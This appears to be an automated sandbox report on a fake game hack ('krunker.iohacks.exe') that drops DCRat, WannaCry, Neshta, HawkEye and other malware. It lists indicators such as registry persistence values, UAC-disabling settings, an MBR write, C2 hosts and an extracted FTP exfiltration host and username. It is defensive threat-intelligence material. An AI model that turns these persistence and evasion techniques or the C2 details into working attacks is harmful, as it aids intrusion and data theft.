dcrat | 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

max time kernel
563s
max time network
1193s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
10-04-2024 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krunker.iohacks.exe
Size

30.9MB
MD5

2850f1cb75953d9e0232344f6a13bf48
SHA1

141ab8929fbe01031ab1e559d880440ae931cc16
SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
SHA512

25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
SSDEEP

786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
files.000webhost.com
Port:
21
Username:
fcb-aws-host-4

Signatures

DcRat 8 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeattrib.exeschtasks.exeschtasks.exe

pid	Process
5964	schtasks.exe
5280	schtasks.exe
5500	schtasks.exe
1628	schtasks.exe
5684	schtasks.exe
1048	attrib.exe
5656	schtasks.exe
5864	schtasks.exe

Detect Neshta payload 8 IoCs

Processes:

resource	yara_rule
behavioral4/memory/1508-125-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-285-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-354-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-393-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-125-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-285-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-354-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral4/memory/1508-393-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Maze
Ransomware family also known as ChaCha.
trojan ransomware maze

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Wattyl.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe"	Wattyl.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5656	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5864	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5964	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5280	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5500	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5684	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5656	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5864	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5964	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5280	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5500	4608	schtasks.exe	110
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5684	4608	schtasks.exe	110

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

pinguin.exe

description	pid	Process	procid_target
PID 5940 created 2124	5940	pinguin.exe	181
PID 5940 created 2124	5940	pinguin.exe	181

Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

6.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral4/memory/1012-520-0x0000000000790000-0x0000000000824000-memory.dmp	dcrat
behavioral4/memory/1012-520-0x0000000000790000-0x0000000000824000-memory.dmp	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Contacts a large (1267) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

Wattyl.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Wattyl.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid	Process
1624	netsh.exe
900	netsh.exe
1604	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 17 IoCs

Processes:

[email protected][email protected]DllHost.exesystem.exe8.exe

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\word\startup\	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt.WNCRY	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\retero.exe	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\retero.exe	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe	system.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6c4f0cb6bd35d8f0.tmp	8.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt	8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD3B09.tmp	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt.WNCRYT	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe	system.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6c4f0cb6bd35d8f0.tmp	8.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt	8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD3AF2.tmp	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.WNCRYT	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.WNCRY	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt	[email protected]

Executes dropped EXE 64 IoCs

Processes:

4363463463464363463463463.exebot.exe[email protected][email protected][email protected]RIP_YOUR_PC_LOL.exe1.exeska2pwej.aeh.exebot.exetaskdl.exeska2pwej.aeh.tmpx2s443bc.cs1.exex2s443bc.cs1.tmp10.exetaskdl.exe5.exe6.exe7.exe8.exesvchost.comVLTKNH~1.EXEsvchost.comTIDEX_~1.EXEsvchost.comTEMPEX~1.EXE6.exeTEMPEX~1Srv.exeTEMPEX~1SrvSrv.exesvchost.comTEMPSP~1.EXEsvchost.comsvchost.comsvchost.comsystem.exetaskdl.exesvchost.compinguin.exesvchost.comLJAUYP~1.EXEsvchost.comTJEAJW~1.EXEliveupdate.exesvchost.comtaskdl.exeALEXXX~1.EXEtaskdl.exesvchost.comidentity_helper.exetaskdl.exesvchost.comsvchost.comsvchost.comIDENTI~1.EXETraffic.exepropro.exesvchost.comtaskdl.exesvchost.comTOOLSP~1.EXEsvchost.comWattyl.exesvchost.comtaskdl.exeSWIZZY~1.EXE

pid	Process
104	4363463463464363463463463.exe
1508	bot.exe
1960	[email protected]
1664	[email protected]
780	[email protected]
2324	RIP_YOUR_PC_LOL.exe
3220	1.exe
2740	ska2pwej.aeh.exe
2136	bot.exe
2376	taskdl.exe
2976	ska2pwej.aeh.tmp
5064	x2s443bc.cs1.exe
4208	x2s443bc.cs1.tmp
4796	10.exe
2376	taskdl.exe
3148	5.exe
1012	6.exe
5024	7.exe
4840	8.exe
5404	svchost.com
5508	VLTKNH~1.EXE
5720	svchost.com
5832	TIDEX_~1.EXE
5820	svchost.com
5872	TEMPEX~1.EXE
320	6.exe
4788	TEMPEX~1Srv.exe
6084	TEMPEX~1SrvSrv.exe
6132	svchost.com
1292	TEMPSP~1.EXE
3308	svchost.com
2712	svchost.com
5604	svchost.com
6000	system.exe
3572	taskdl.exe
2124	svchost.com
5940	pinguin.exe
1268	svchost.com
5904	LJAUYP~1.EXE
3480	svchost.com
5256	TJEAJW~1.EXE
5340	liveupdate.exe
2904	svchost.com
5184	taskdl.exe
2820	ALEXXX~1.EXE
4636	taskdl.exe
6500	svchost.com
6400	identity_helper.exe
6876	taskdl.exe
6028	svchost.com
6164	svchost.com
6756	svchost.com
504	IDENTI~1.EXE
2108	Traffic.exe
6992	propro.exe
1460	svchost.com
6688	taskdl.exe
3724	svchost.com
6596	TOOLSP~1.EXE
5768	svchost.com
4784	Wattyl.exe
2328	svchost.com
6824	taskdl.exe
6916	SWIZZY~1.EXE

Loads dropped DLL 2 IoCs

Processes:

liveupdate.exe

pid	Process
5340	liveupdate.exe
5340	liveupdate.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exe

pid	Process
2532	icacls.exe
2204	icacls.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

bot.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 26 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/1664-98-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-69-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-127-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-223-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-225-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-226-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-337-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-361-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-396-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/4788-808-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral4/memory/4788-810-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral4/memory/6084-823-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral4/memory/1292-824-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral4/memory/1664-98-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-69-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-127-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-223-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-225-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-226-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-337-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-361-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/1664-396-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral4/memory/4788-808-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral4/memory/4788-810-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral4/memory/6084-823-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral4/memory/1292-824-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

[email protected]6.exestub.exe7.exeWattyl.exebot.exesystem.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\rdrleakdiag\\dllhost.exe\""	6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Install name = "C:\\Users\\Admin\\AppData\\Local\\Install path\\Install name"	stub.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x2s443bc.cs1.tmp = "\"C:\\PerfLogs\\x2s443bc.cs1.tmp.exe\""	6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Recovery\\WindowsRE\\bot.exe\""	6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\CfgSPPolicy\\lsass.exe\""	6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe"	Wattyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\msedge.exe\""	6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe"	bot.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .."	system.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .."	system.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\System32\\microsoft-windows-power-cad-events\\SppExtComObj.exe\""	6.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

6.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Wattyl.exe[email protected]

description	ioc	Process
File opened (read-only)	\??\w:	Wattyl.exe
File opened (read-only)	\??\a:	[email protected]
File opened (read-only)	\??\e:	Wattyl.exe
File opened (read-only)	\??\o:	Wattyl.exe
File opened (read-only)	\??\t:	Wattyl.exe
File opened (read-only)	\??\u:	Wattyl.exe
File opened (read-only)	\??\y:	Wattyl.exe
File opened (read-only)	\??\b:	[email protected]
File opened (read-only)	\??\l:	[email protected]
File opened (read-only)	\??\p:	[email protected]
File opened (read-only)	\??\p:	Wattyl.exe
File opened (read-only)	\??\l:	Wattyl.exe
File opened (read-only)	\??\v:	Wattyl.exe
File opened (read-only)	\??\o:	[email protected]
File opened (read-only)	\??\b:	Wattyl.exe
File opened (read-only)	\??\j:	Wattyl.exe
File opened (read-only)	\??\k:	Wattyl.exe
File opened (read-only)	\??\w:	[email protected]
File opened (read-only)	\??\g:	Wattyl.exe
File opened (read-only)	\??\i:	Wattyl.exe
File opened (read-only)	\??\n:	Wattyl.exe
File opened (read-only)	\??\m:	[email protected]
File opened (read-only)	\??\r:	[email protected]
File opened (read-only)	\??\s:	[email protected]
File opened (read-only)	\??\v:	[email protected]
File opened (read-only)	\??\z:	[email protected]
File opened (read-only)	\??\h:	Wattyl.exe
File opened (read-only)	\??\m:	Wattyl.exe
File opened (read-only)	\??\z:	Wattyl.exe
File opened (read-only)	\??\g:	[email protected]
File opened (read-only)	\??\h:	[email protected]
File opened (read-only)	\??\j:	[email protected]
File opened (read-only)	\??\k:	[email protected]
File opened (read-only)	\??\e:	[email protected]
File opened (read-only)	\??\x:	[email protected]
File opened (read-only)	\??\y:	[email protected]
File opened (read-only)	\??\r:	Wattyl.exe
File opened (read-only)	\??\q:	[email protected]
File opened (read-only)	\??\a:	Wattyl.exe
File opened (read-only)	\??\q:	Wattyl.exe
File opened (read-only)	\??\s:	Wattyl.exe
File opened (read-only)	\??\x:	Wattyl.exe
File opened (read-only)	\??\i:	[email protected]
File opened (read-only)	\??\n:	[email protected]
File opened (read-only)	\??\t:	[email protected]
File opened (read-only)	\??\u:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

Processes:

flow	ioc
2632	raw.githubusercontent.com
2541	raw.githubusercontent.com
2637	raw.githubusercontent.com
2773	pastebin.com
2538	raw.githubusercontent.com
2545	raw.githubusercontent.com
2568	raw.githubusercontent.com
2691	pastebin.com
2682	pastebin.com
2756	bitbucket.org
2820	raw.githubusercontent.com
2530	raw.githubusercontent.com
2625	raw.githubusercontent.com
2627	raw.githubusercontent.com
2643	bitbucket.org
2655	raw.githubusercontent.com
2832	raw.githubusercontent.com
2631	raw.githubusercontent.com
2	iplogger.org
337	iplogger.org
2628	raw.githubusercontent.com
2654	raw.githubusercontent.com
2763	bitbucket.org
2822	raw.githubusercontent.com
1256	bitbucket.org
2466	raw.githubusercontent.com
2537	raw.githubusercontent.com
2542	raw.githubusercontent.com
2566	raw.githubusercontent.com
2681	raw.githubusercontent.com
2838	raw.githubusercontent.com
1	iplogger.org
1298	bitbucket.org
2564	raw.githubusercontent.com
2634	raw.githubusercontent.com
2645	bitbucket.org
2713	raw.githubusercontent.com
2819	raw.githubusercontent.com
2534	raw.githubusercontent.com
2711	raw.githubusercontent.com
2724	raw.githubusercontent.com
2821	raw.githubusercontent.com
2465	raw.githubusercontent.com
2543	raw.githubusercontent.com
2626	raw.githubusercontent.com
2656	raw.githubusercontent.com
2701	raw.githubusercontent.com
2826	raw.githubusercontent.com
2549	raw.githubusercontent.com
2640	raw.githubusercontent.com
2522	bitbucket.org
2547	raw.githubusercontent.com
2573	raw.githubusercontent.com
2595	raw.githubusercontent.com
2536	raw.githubusercontent.com
2597	raw.githubusercontent.com
2639	pastebin.com
2705	raw.githubusercontent.com
2831	raw.githubusercontent.com
2613	pastebin.com
2633	raw.githubusercontent.com
2824	raw.githubusercontent.com
2524	bitbucket.org
2657	raw.githubusercontent.com

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
2483	ip-api.com
2539	whoer.net
2630	whoer.net
2785	ip-api.com
1292	whatismyipaddress.com
2520	api.myip.com
2522	ipinfo.io
2523	api.myip.com
2540	whoer.net
2797	whoer.net
2525	ipinfo.io
1257	whatismyipaddress.com
2825	whoer.net

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

VLTKNH~1.EXE

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	VLTKNH~1.EXE

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

bot.exe

description	ioc	Process
File created	C:\autorun.inf	bot.exe
File opened for modification	C:\autorun.inf	bot.exe
File created	F:\autorun.inf	bot.exe
File opened for modification	F:\autorun.inf	bot.exe

Drops file in System32 directory 49 IoCs

Processes:

[email protected]Wattyl.exe6.exe

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\documents	[email protected]
File created	C:\Windows\SysWOW64\setting.ini	Wattyl.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat!	[email protected]
File opened for modification	C:\Windows\System32\microsoft-windows-power-cad-events\SppExtComObj.exe	6.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat!	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server	[email protected]
File opened for modification	C:\Windows\SysWOW64\setting.ini	Wattyl.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word	[email protected]
File created	C:\Windows\System32\rdrleakdiag\dllhost.exe	6.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird	[email protected]
File created	C:\Windows\System32\microsoft-windows-power-cad-events\e1ef82546f0b02b7e974f28047f3788b1128cce1	6.exe
File created	C:\Windows\System32\CfgSPPolicy\lsass.exe	6.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\desktop	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word	[email protected]
File created	C:\Windows\System32\CfgSPPolicy\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9	6.exe
File created	C:\Windows\System32\rdrleakdiag\5940a34987c99120d96dace90a3f93f329dcad63	6.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word	[email protected]
File created	C:\Windows\SysWOW64\RVHOST.exe	Wattyl.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office	[email protected]
File created	C:\Windows\System32\microsoft-windows-power-cad-events\SppExtComObj.exe	6.exe
File opened for modification	C:\Windows\SysWOW64\RVHOST.exe	Wattyl.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

[email protected]8.exe[email protected]

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp5828.bmp"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp"	8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	[email protected]

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

stub.exe

pid	Process
